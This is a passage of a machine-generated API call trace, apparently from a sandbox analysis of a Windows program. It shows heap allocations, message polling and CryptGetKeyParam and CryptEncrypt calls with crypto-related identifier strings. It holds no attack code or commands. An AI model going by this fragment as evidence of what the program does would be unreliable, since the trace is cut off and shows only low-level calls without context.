lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.418] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.419] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0042.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.419] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0042.420] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.421] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.424] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.424] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.424] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.424] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.424] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.425] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.425] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.425] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.426] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.426] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.427] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x165e8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x165f0) returned 1 [0042.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) 